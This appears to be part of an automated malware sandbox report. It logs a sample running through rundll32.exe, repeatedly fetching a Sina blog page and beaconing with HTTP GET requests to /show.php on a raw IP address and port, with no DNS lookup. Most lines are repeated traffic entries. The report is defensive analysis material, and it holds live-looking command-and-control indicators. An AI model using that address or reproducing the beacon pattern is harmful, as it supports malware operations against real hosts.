Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56556 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.241.232

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_10004990 InternetReadFile,

11_2_10004990

Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
